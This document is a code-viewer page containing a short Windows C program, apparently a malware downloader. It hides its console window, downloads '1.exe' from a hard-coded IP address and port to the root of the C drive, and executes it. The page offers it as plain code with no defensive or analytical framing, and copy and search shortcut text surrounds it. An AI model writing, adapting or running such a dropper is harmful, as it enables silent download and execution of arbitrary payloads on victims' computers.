📄 代码.txt
字号:
#include <windows.h>
#include <urlmon.h>
#include<process.h>
#include<shellapi.h>
#pragma comment (lib,"Urlmon.lib")
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
int main(int argc, char* argv[])
{
URLDownloadToFile
(NULL,"http://218.82.84.240:1478/1.exe","c:\\1.exe",0,NULL);
ShellExecute(0,"open","c:\\1.exe",NULL,NULL,SW_SHOW);
exit(0);
return 0;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -